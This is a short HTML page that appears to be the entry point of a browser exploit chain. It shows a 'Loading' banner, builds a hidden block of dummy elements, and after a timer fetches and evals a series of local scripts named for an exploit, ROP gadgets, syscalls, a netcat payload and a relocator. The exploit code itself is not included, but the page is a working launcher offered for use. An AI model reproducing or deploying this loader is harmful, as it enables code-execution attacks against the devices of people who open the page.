<html>
<body>
<h2>Loading...Wait 15-20 Seconds!!!</h2>
<!-- preload necessary fonts before exploit -->
<div style="opacity: 0">
<p><i>Italic text</i></p>
<table>
<tr>
<th>H1</th>
<th>H2</th>
<th>H3</th>
</tr>
<tr>
<td>text</td>
<td><input value="text"/></td>
<td><button>text</button></td>
</tr>
</table>
</div>
<script>
function loadScript(path)
{
    var xhr = new XMLHttpRequest(path);
    xhr.open("GET", path, false);
    xhr.send('');
    return xhr.responseText;
}

setTimeout(function(){
eval.call(window, loadScript('./payloads/netcat.js')
+loadScript('./payloads/exploit.js')
+loadScript('./payloads/malloc.js')
+loadScript('./payloads/rop_sleirs.js')
+loadScript('./payloads/syscalls.js')
+loadScript('./payloads/syscalls2.js')
+loadScript('./payloads/payload.js')
+loadScript('./payloads/relocator.js')
+loadScript('./payloads/frontend.js'));
document.getElementById('q').innerHTML = 'Some other text';
}, 50);
</script>
</body>
</html>
